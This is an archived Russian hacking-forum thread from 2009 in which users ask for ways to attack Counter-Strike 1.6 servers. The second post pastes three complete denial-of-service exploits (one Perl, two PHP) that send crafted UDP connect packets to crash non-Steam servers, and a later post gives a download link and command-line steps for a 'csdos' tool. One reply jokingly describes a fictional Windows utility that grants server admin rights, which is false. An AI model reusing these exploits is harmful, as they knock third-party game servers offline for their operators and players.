Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Програма для взлома серва CS 1.6

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Программы для взлома] >> Програма для взлома серва CS 1.6
Имя
Сообщение << Старые топики   Новые топики >>
Програма для взлома серва CS 1.6 - 2009-07-03 00:05:43.850000   
rena

Сообщений: 2
Оценки: 0
Присоединился: 2009-07-01 23:47:43.226666
Поделитесь кто что знает кроме CsHacka…
Post #: 1
RE: Програма для взлома серва CS 1.6 - 2009-07-03 01:43:59.610000   
shad0vv

Сообщений: 165
Оценки: 0
Присоединился: 2008-07-15 19:53:01.200000
1. я уже тебе написал 3 метода взлома день или 2 назад!
2. когда вы задовбетесь задавать тупые вопросы по 3 раза в день в 10 темах?!
сплоит на перле:
#!/usr/bin/perl use IO::Socket; die "usage: ./csdos &lt;host&gt;" unless $ARGV[0]; $host=$ARGV[0]; if (fork()) { econnect($host); } else { econnect($host); }; exit; sub econnect($) { my $host=$_[0]; my $sock = new IO::Socket::INET(PeerAddr=&gt;"127.0.0.1",PeerPort=&gt;'27015',Proto=&gt;'udp'); die "Could not create socket: $!\n" unless $sock; $cmd="\xff\xff\xff\xff"; syswrite $sock, $cmd."getchallenge"; sysread $sock,$b,65535; print $b,"\n"; @c=split(/ /,$b); $c2=$c[1]; $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a362 58af1bb64ed866538c9db76\"\"\\\"\0\0"; print '&gt;',$q,"\n"; syswrite $sock, $q; sysread $sock,$b,65535; print $b,"\n"; sleep 3; close $sock; } сплоит на пхп (от гемоглабина):
----[ Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ] Counter Strike 1.6 Denial Of Service POC Eugene Minaev underwater@itdefence.ru Bug was found by Maxim Suhanov ( THE FUF ) works only with no-steam servers ___________________________________________________________________ ____/ __ __ _______________________ _______ _______________ \ \ \ / .\ / /_// // / \ \/ __ \ /__/ / / / /_// /\ / / / / /___/ \/ / / / / /\ / / / / / \/ / / / / /__ //\ \ / ____________/ / \/ __________// /__ // / /\\ \_______/ \________________/____/ 2007 /_//_/ // //\ \ \\ // // / .\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / . . \_\\________[________________________________________]_________//_//_/ . . &lt;html&gt; &lt;head&gt; &lt;title&gt;Counter Strike DOS POC (underwater@itdefence.ru) &lt;/title&gt; &lt;style type="text/css"&gt; input { width: 150px; } td { font-size: 12px; font-family: Verdana, "Trebuchet MS"; text-align: left; } span.err { color: red; } span.ok { color: green; } &lt;/style&gt; &lt;/head&gt; &lt;bоdу оnlоаd="checkpass()"&gt; &lt;div style="width: 210px; margin: auto;"&gt; &lt;form name="csform" method="post" action="cs.php"&gt; &lt;table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;"&gt; &lt;tr&gt; &lt;td style="width: 50px;"&gt;Host&lt;/td&gt; &lt;td colspan="2"&gt;&lt;input name="host" type="text" value=""/&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt;Port&lt;/td&gt; &lt;td colspan="2"&gt;&lt;input name="port" type="text" value=""/&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt; &lt;/td&gt; &lt;td&gt;&lt;input name="auth" type="checkbox" value="" style="width: 30px;"/&gt;&lt;/td&gt; &lt;td&gt;Auth Type 2&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt;Pass&lt;/td&gt; &lt;td colspan="2"&gt;&lt;input name="pass" type="text" value="" /&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt; &lt;/td&gt; &lt;td colspan="2"&gt;&lt;input type="submit" Value="Run"/&gt;&lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;br/&gt; &lt;/form&gt; &lt;/div&gt; &lt;center&gt;ITDEFENCE / RUSSIA (http://itdefence.ru)&lt;br&gt; &lt;/bоdу&gt; &lt;/html&gt; &lt;?php /* CS-dos exploit made by underwater Bug was discovered by .FUF Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su */ ini_set("display_errors","0"); function HELLO_PACKET() { $packet = pack("H*","FFFFFFFF"); $packet .= "TSource Engine Query"; $packet .= pack("H*","00"); return $packet; } function CHALLENGE_PACKET() { $packet = pack("H*","FFFFFFFF"); $packet .= "getchallenge valve"; $packet .= pack("H*","00"); return $packet; } function LOGIN_PACKET_4() { global $cookie; global $password; $packet = pack("H*","FFFFFFFF"); $packet .= "connect 47 "; $packet .= $cookie.' "'; $packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "'; $packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updаtеrate\30\mod'; $packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass'; $packet .= 'word\\'.$password; $packet .= pack("H*","220A0000EE02"); return $packet; } function LOGIN_PACKET_2() { global $cookie; global $password; $packet = pack("H*","FFFFFFFF"); $packet .= "connect 47 "; $packet .= $cookie.' "'; $packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott'; $packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updаtеrate\30\model\gordon\nam'; $packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass'; $packet .= 'word\\'.$password; $packet .= pack("H*","22"); return $packet; } function dowork($host,$port,$password,$auth) { global $password; global $cookie; # connecting to target host $fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2); if (!$fsock) die ($errstr); else { # sending hello packet fwrite ($fsock,HELLO_PACKET()); fread ($fsock,100); # sending chalennge packet fwrite ($fsock,CHALLENGE_PACKET()); # recieving cookies $resp = fread($fsock,100); # grab cookies from packet $cookie = substr($resp,strpos($resp,"A00000000")+10); $cookie = substr($cookie,0,strpos($cookie," ")); # sending login packet if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2()); $resp = fread($fsock,100); } } IF (isset($_POST['host']) && isset($_POST['port'])) { IF (empty($_POST['pass'])) $password = "123"; else $password = $_POST['pass']; $fserver = $_POST['host']; $fport = $_POST['port']; if (isset($_POST['auth'])) $fauth = true;else $fauth=false; # we have to connect 2 times $result = dowork($fserver,$fport,$password,$fauth); $result = dowork($fserver,$fport,$password,$fauth); # parsing result echo "Exploit Sent"; } ?&gt; ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] еще один сплоит на пхп:
&lt;? error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 5); ob_implicit_flush (1); echo'&lt;html&gt;&lt;head&gt;&lt;title&gt; ******* CS 1.6 DDOS ************** &lt;/title&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt; &lt;style type="text/css"&gt; bоdу {background-color:#111111; SCROLLBAR-ARROW-COLOR: #ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img {background-color: #FFFFFF !important} input {background-color: #303030 !important} option { background-color: #303030 !important} textarea {background-color: #303030 !important} input {color: #1CB081 !important} option {color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox {background-color: #303030 !important} select {font-weight: normal; color: #1CB081; background-color: #303030;} bоdу {font-size: 8pt !important; background-color: #111111; bоdу * {font-size: 8pt !important} h1 {font-size: 0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em !important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em !important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style: normal !important} *{text-decoration: none !important} a:link,a:active,a:visited { text-decoration: none; color : #99aa33; } a:hover{text-decoration: underline; color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:bold; font-style: italic;}--&gt;&lt;/style&gt;&lt;/head&gt;&lt;bоdу&gt;&lt;p class="Stile6"&gt; ******* CS 1.6 DDOS PORTED TO PHP BY SYSGHOST ************ &lt;/p&gt;&lt;p class="Stile6"&gt; Visit our homepage &lt;a href="hTTp://Romania.HackTECK.BE"target="_blank"&gt; hTTp://Romania.HackTECK.BE&lt;/a&gt; &lt;/p&gt; &lt;table width="84%"&gt;&lt;tr&gt;&lt;td width="43%"&gt; &lt;form name="form1" method="post" action="'.$_SERVER[PHP_SELF].'"&gt; &lt;p&gt;&lt;input type="text" name="host"&gt; &lt;span class="Stile5"&gt;* ip (ex: 127.0.0.1 ) &lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;input type="text" name="time"&gt; &lt;span class="Stile5"&gt; * de cate ori&lt;/span&gt;&lt;/p&gt; &lt;p&gt; &lt;input type="submit" name="Submit" value="HeadShot"&gt;&lt;/p&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/bоdу&gt;&lt;/html&gt;'; print "Made after Rgod's exploit template the best i could find greetz."; function show($headeri) { $ii=0;$ji=0;$ki=0;$ci=0; echo '&lt;table border="0"&gt;&lt;tr&gt;'; while ($ii &lt;= strlen($headeri)-1){ $dAtAi=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo "&lt;td&gt;  &lt;/td&gt;"; for ($li=0; $li&lt;=15; $li++) { echo "&lt;td&gt;".htmlentities($headeri[$li+$ki])."&lt;/td&gt;"; } $ki=$ki+16; echo "&lt;/tr&gt;&lt;tr&gt;"; } if (strlen($dAtAi)==1) { echo "&lt;td&gt;0".htmlentities($dAtAi)."&lt;/td&gt;"; } else { echo "&lt;td&gt;".htmlentities($dAtAi)."&lt;/td&gt; "; } $ii++;$ji++; } for ($li=1; $li&lt;=(16 - (strlen($headeri) % 16)+1); $li++) { echo "&lt;td&gt;  &lt;/td&gt;"; } for ($li=$ci*16; $li&lt;=strlen($headeri); $li++) { echo "&lt;td&gt;".htmlentities($headeri[$li])."&lt;/td&gt;"; } echo "&lt;/tr&gt;&lt;/table&gt;"; } function doit($host){ $socket = socket_create(AF_INET, SOCK_RAW, 2); socket_connect($sock,$host, 27015); $string="\xff\xff\xff\xffgetchallenge"; print "Sending..."; print show($string); socket_write($socket, $string); $trimis = socket_read($socket, 65535); print "Response:&lt;br&gt;"; print $trimis; print "---------------------------------------------------------------------------------"; show($trimis); $bucati = explode(" ", $trimis); echo $bucati[0]; $end = '"\prot\4\unique\0\raw\valve\cdkey\f0ef8a36258af1bb64ed866538c9db76""\"'; $string="\xff\xff\xff\xffconnect 47 ".$bucati[0].$end; print "Sending..."; show($string); print "serverul ar trebui sa fie jos...."; socket_write($socket, $string); sleep(3); socket_close($socket); print "&lt;center&gt;&lt;img src='http://systemghost.as.ro/logo.jpg'&gt;&lt;/center&gt;"; } if(!isset($_POST['host'])) { die("."); } $host = $_POST['host']; $time = $_POST['time'] -1; while ( $time &gt;= 0 ) { doit($host); $time = $time - 1; } ?&gt; пы.сы. если на серве новые патчи, хлдс шаелд или ето стим - не прокатит
Post #: 2
RE: Програма для взлома серва CS 1.6 - 2009-07-04 14:12:07.490000   
xswsx

Сообщений: 19
Оценки: 0
Присоединился: 2007-04-19 14:21:35.403333
offtop
 
Парни прекратите ему вообще отвечать что либо это малолетний сопливый человечек….читерок которого на какомто сервере забанили и он теперь исходит фекалиями,в предыдущей теме мне пытался доказать что программы или сплойты которые он ищет совсем не для этих целей которые определяются в названия тем !
Post #: 3
RE: Програма для взлома серва CS 1.6 - 2009-07-13 15:55:56.630000   
Guest~

Сообщений: 2
Оценки: 0
Присоединился: 2009-07-13 15:39:55.093333
Ну че пацаны.Пришла помощь )))))))
Качаем: http://ifolder.ru/13086491

Кидем этот файлик в дерикторию C:/
Заходим в Run>cmd
Пишем: C:/csdos "Айпи сервака" (Без ковычек) нажимаем Enter.ВСЕ!!!!:D:D:D:D:D:D:):):'(
Post #: 4
RE: Програма для взлома серва CS 1.6 - 2009-07-13 22:23:28.386666   
Christmas.

Сообщений: 103
Оценки: 0
Присоединился: 2009-07-07 16:16:20.296666
Запустил прогу и что теперь делать.?
Post #: 5
RE: Програма для взлома серва CS 1.6 - 2009-07-14 10:41:15.373333   
Guest~

Сообщений: 2
Оценки: 0
Присоединился: 2009-07-13 15:39:55.093333
!!!!!!!!!!!!!!!!!!!!!!!Пишем: C:/csdos "Айпи сервака" (Без ковычек) нажимаем Enter.ВСЕ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Процесс взлома пройдет быстро.
Post #: 6
RE: Програма для взлома серва CS 1.6 - 2009-07-22 07:28:31.546666   
Antonfsb

Сообщений: 5
Оценки: 0
Присоединился: 2009-07-22 05:39:42.566666
и чё покатит?
Post #: 7
RE: Програма для взлома серва CS 1.6 - 2009-08-01 23:43:29.750000   
mr.crown

Сообщений: 37
Оценки: 0
Присоединился: 2007-03-02 15:28:48.440000
Во ДИБИЛЫ…
quote:

и чё покатит?

Покатит, покатит!
Post #: 8
RE: Програма для взлома серва CS 1.6 - 2009-08-05 22:32:23.640000   
gigs2

Сообщений: 21
Оценки: 0
Присоединился: 2009-06-25 22:07:27.386666
Как с этой программой сделать себя админом?
Post #: 9
RE: Програма для взлома серва CS 1.6 - 2009-08-05 23:43:50.913333   
mr.crown

Сообщений: 37
Оценки: 0
Присоединился: 2007-03-02 15:28:48.440000
Блин… Уже пора бы знать, что Microsoft позаботилась о бо всем, и предусмотрела софт на все случаи жизни. Не забыли они и о КС, встроенная в форточки утилита: "makemecsadmin.exe <server_IP>" делает вас одмином любого сервера (<server_IP> – IP-адресс сервера)! Юзойте детки
Post #: 10
RE: Програма для взлома серва CS 1.6 - 2009-08-17 10:53:21.830000   
YouMustDie

Сообщений: 3
Оценки: 0
Присоединился: 2009-08-14 23:44:49.670000
Это только по локальной сети пашет или по нету?
Post #: 11
Страниц:  [1]
Все форумы >> [Программы для взлома] >> Програма для взлома серва CS 1.6







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.